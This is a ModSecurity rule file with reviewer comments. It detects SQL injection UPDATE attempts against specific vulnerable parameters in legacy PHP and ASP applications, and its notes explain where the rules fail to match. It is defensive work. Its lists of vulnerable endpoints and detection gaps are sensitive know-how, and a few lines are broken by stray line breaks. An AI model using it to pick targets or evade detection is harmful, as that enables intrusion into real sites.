SecRule REQUEST_LINE "@contains /search.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004821,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Sphider SQL Injection Attempt -- search.php category UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/20131'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:category/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Sphider SQL Injection Attempt -- search.php category UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005157) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines UPDATE
SecRule REQUEST_LINE "@contains /rss/show_webfeed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005157,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22282'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:wcHeadlines/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines
UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): each rule here is a chain. Link one is a case-sensitive @contains
# on REQUEST_LINE (no t:lowercase in its t: list). The last link either counts TX
# variables whose name matches /SQL_INJECTION.*ARGS:<param>/ or runs an
# UPDATE...SET regex over QUERY_STRING|REQUEST_BODY; on a full match
# tx.critical_anomaly_score is added to tx.anomaly_score.
# The TX-count links depend on an earlier rule having stored a matching TX
# variable (presumably the generic SQL injection rules; confirm load order). Their
# regexes are not end-anchored, so ARGS:cat also matches e.g. a variable recorded
# for an argument named category.
# (2004827) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Super Link Exchange Script SQL Injection Attempt -- directory.php cat UPDATE
SecRule REQUEST_LINE "@contains /directory.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004827,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Super Link Exchange Script SQL Injection Attempt -- directory.php cat UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/435166/30/4680/threaded'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:cat/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Super Link Exchange Script SQL Injection Attempt -- directory.php cat UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): the next two rules use a regex link with no t: actions of its own
# and no parameter scoping; it requires at least one character before UPDATE.
# Confirm which transformations apply to it, and expect hits on any request to
# these paths whose query string or body contains "update ... set" text.
# (2006638) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Superfreaker Studios UPublisher SQL Injection Attempt -- sendarticle.asp UPDATE
SecRule REQUEST_LINE "@contains /sendarticle.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006638,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Superfreaker Studios UPublisher SQL Injection Attempt -- sendarticle.asp UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/453462/100/0/threaded'"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:.+UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Superfreaker Studios UPublisher SQL Injection Attempt -- sendarticle.asp UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006644) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Superfreaker Studios UPublisher SQL Injection Attempt -- printarticle.asp UPDATE
SecRule REQUEST_LINE "@contains /printarticle.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006644,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Superfreaker Studios UPublisher SQL Injection Attempt -- printarticle.asp UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/453462/100/0/threaded'"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:.+UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Superfreaker Studios UPublisher SQL Injection Attempt -- printarticle.asp UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006650) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Superfreaker Studios UPublisher SQL Injection Attempt -- index.asp ID UPDATE
SecRule REQUEST_LINE "@contains /index.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006650,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Superfreaker Studios UPublisher SQL Injection Attempt -- index.asp ID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/453462/100/0/threaded'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Superfreaker Studios UPublisher SQL Injection Attempt -- index.asp ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006656) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Superfreaker Studios UPublisher SQL Injection Attempt -- preferences.asp ID UPDATE
SecRule REQUEST_LINE "@contains /preferences.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006656,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Superfreaker Studios UPublisher SQL Injection Attempt -- preferences.asp ID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/453462/100/0/threaded'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Superfreaker Studios UPublisher SQL Injection Attempt -- preferences.asp ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): three-link chain. The middle link requires the literal "board[" in
# REQUEST_LINE; the final regex link is not limited to that parameter and has no
# t: actions of its own.
# (2005572) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ThWboard SQL Injection Attempt -- index.php board UPDATE
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005572,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ThWboard SQL Injection Attempt -- index.php board UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3124'"
    SecRule REQUEST_LINE "@contains board[" "chain"
        SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ThWboard SQL Injection Attempt -- index.php board UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006008) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php lastname UPDATE
SecRule REQUEST_LINE "@contains /user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006008,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php lastname UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21870'"
SecRule &TX:'/SQL_INJECTION.*ARGS:lastname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php lastname UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): the rules in this run all key on the same /user.php path and
# differ only in the argument name counted in the second link. Each one that
# matches adds tx.critical_anomaly_score again, so a single request with several
# flagged arguments accumulates the score once per matching rule; size the
# blocking threshold with that in mind.
# The second link only fires when an earlier rule has stored a TX variable whose
# name matches /SQL_INJECTION.*ARGS:<param>/ (presumably the generic SQL injection
# rules; confirm load order). The path match is a case-sensitive @contains.
# (2006014) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php firstname UPDATE
SecRule REQUEST_LINE "@contains /user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006014,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php firstname UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21870'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:firstname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php firstname UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006020) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php passwordOld UPDATE
SecRule REQUEST_LINE "@contains /user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006020,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php passwordOld UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21870'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:passwordOld/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php passwordOld UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006026) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php passwordNew UPDATE
SecRule REQUEST_LINE "@contains /user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006026,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php passwordNew UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21870'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:passwordNew/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php passwordNew UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): the selector regex is not end-anchored, so ARGS:id also matches
# variables recorded for longer argument names that start with "id".
# (2006032) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php id UPDATE
SecRule REQUEST_LINE "@contains /user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006032,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21870'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006038) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php language UPDATE
SecRule REQUEST_LINE "@contains /user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006038,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php language UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21870'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:language/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php language UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006044) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php defaultLetter UPDATE
SecRule REQUEST_LINE "@contains /user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006044,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php defaultLetter UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21870'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:defaultLetter/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php defaultLetter UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006050) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php newuserPass UPDATE
SecRule REQUEST_LINE "@contains /user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006050,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php newuserPass UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21870'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:newuserPass/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php newuserPass
UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): each rule here is a two-link chain. Link one is a case-sensitive
# @contains on REQUEST_LINE (no t:lowercase in its t: list); link two counts TX
# variables whose name matches /SQL_INJECTION.*ARGS:<param>/ and, when at least
# one exists, adds tx.critical_anomaly_score to tx.anomaly_score and adds part E
# to the audit log.
# Nothing fires unless an earlier rule has stored such a TX variable (presumably
# the generic SQL injection rules; confirm they are loaded and run first).
# (2006056) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php newuserType UPDATE
SecRule REQUEST_LINE "@contains /user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006056,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php newuserType UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21870'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:newuserType/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php newuserType UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006062) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php newuserEmail UPDATE
SecRule REQUEST_LINE "@contains /user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006062,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php newuserEmail UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21870'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:newuserEmail/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php newuserEmail UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): /search.php with an argument named "search" is a very common
# combination, so the product named in msg is an attribution hint only; the rule
# matches any application that exposes that path and argument once the generic
# detection has flagged it.
# (2006068) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- search.php goTo UPDATE
SecRule REQUEST_LINE "@contains /search.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006068,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- search.php goTo UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21870'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:goTo/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- search.php goTo UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006074) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- search.php search UPDATE
SecRule REQUEST_LINE "@contains /search.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006074,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- search.php search UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21870'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:search/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- search.php search UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006080) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- save.php groupAddName UPDATE
SecRule REQUEST_LINE "@contains /save.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006080,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- save.php groupAddName UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21870'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:groupAddName/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- save.php groupAddName UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): the selector regex is not end-anchored, so ARGS:id also matches
# variables recorded for longer argument names that start with "id". The .asp
# path is compared case-sensitively; if the protected server resolves paths
# case-insensitively (TODO confirm), consider t:lowercase with a lowercase operand.
# (2004874) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Turuncu Portal SQL Injection Attempt -- h_goster.asp id UPDATE
SecRule REQUEST_LINE "@contains /h_goster.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004874,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Turuncu Portal SQL Injection Attempt -- h_goster.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22591'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Turuncu Portal SQL Injection Attempt -- h_goster.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004677) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Tyger Bug Tracking System (TygerBT) SQL Injection Attempt -- ViewReport.php bug UPDATE
SecRule REQUEST_LINE "@contains /ViewReport.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004677,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Tyger Bug Tracking System (TygerBT) SQL Injection Attempt -- ViewReport.php bug UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/24385'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:bug/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Tyger Bug Tracking System (TygerBT) SQL Injection Attempt -- ViewReport.php bug UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004682) SpiderLabs Research (SLR) Public Vulns: ET
WEB_SPECIFIC_APPS Tyger Bug Tracking System (TygerBT) SQL Injection Attempt -- ViewBugs.php s UPDATE
# How the two-link chains in this section work (rule 2004682 as the example):
#   link 1: REQUEST_LINE, after t:urlDecodeUni, t:htmlEntityDecode and
#           t:normalisePathWin, must contain the literal given to @contains.
#   link 2: "&TX:'/regex/'" counts the TX variables whose name matches the
#           regex; "@gt 0" requires at least one.
#   on match: audit-log part E is added, tx.msg is set, tx.anomaly_score is
#           raised by tx.critical_anomaly_score, and the matched variable is
#           stored as tx.<rule id>-WEB_ATTACK/SQL_INJECTION-<variable name>.
# NOTE(review): presumably the TX variables that link 2 looks for are written
# by generic SQL-injection rules that ran earlier in the same transaction
# (the setvar below uses the same naming scheme). If those rules are disabled
# or loaded after this file, link 2 never matches - confirm the include order.
# NOTE(review): the name regex has no end anchor, so "ARGS:s" is satisfied by
# every argument whose name merely starts with "s", not only the parameter
# "s" named in the message. Anchoring it ("ARGS:s$") would limit the extra
# critical score to that parameter.
# NOTE(review): link 1 inspects the whole request line, so the literal also
# matches when it appears in the query string rather than in the path.
# NOTE(review): @contains compares case-sensitively and no t:lowercase is
# applied, so the path literal only matches in the exact case written here.
SecRule REQUEST_LINE "@contains /ViewBugs.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004682,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Tyger Bug Tracking System (TygerBT) SQL Injection Attempt -- ViewBugs.php s UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22799'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:s/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Tyger Bug Tracking System (TygerBT) SQL Injection Attempt -- ViewBugs.php s UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005238) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Unique Ads (UDS) SQL Injection Attempt -- banner.php bid UPDATE
# Same two-link pattern: request line contains "/banner.php" and a TX
# variable name matches /SQL_INJECTION.*ARGS:bid/.
# NOTE(review): unanchored, so longer argument names beginning with "bid"
# also satisfy link 2.
SecRule REQUEST_LINE "@contains /banner.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005238,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Unique Ads (UDS) SQL Injection Attempt -- banner.php bid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/457667/100/0/threaded'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:bid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Unique Ads (UDS) SQL Injection Attempt -- banner.php bid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006891) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Uapplication UPhotoGallery SQL Injection Attempt -- slideshow.asp ci UPDATE
# Same two-link pattern: "/slideshow.asp" plus a TX name matching
# /SQL_INJECTION.*ARGS:ci/ (unanchored; also matches names starting "ci").
# NOTE(review): the target is an .asp path but the match is case-sensitive;
# if the protected server resolves paths case-insensitively, add t:lowercase
# and lower-case the literal - confirm against the deployment.
SecRule REQUEST_LINE "@contains /slideshow.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006891,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Uapplication UPhotoGallery SQL Injection Attempt -- slideshow.asp ci UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21319'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:ci/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Uapplication UPhotoGallery SQL Injection Attempt -- slideshow.asp ci UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006897) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Uapplication UPhotoGallery SQL Injection Attempt -- thumbnails.asp ci UPDATE
# Sibling of 2006891 for "/thumbnails.asp"; same TX name regex and the same
# anchoring and case caveats.
SecRule REQUEST_LINE "@contains /thumbnails.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006897,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Uapplication UPhotoGallery SQL Injection Attempt -- thumbnails.asp ci UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21319'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:ci/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Uapplication UPhotoGallery SQL Injection Attempt -- thumbnails.asp ci UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005008) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ublog Reload SQL Injection Attempt -- badword.asp UPDATE
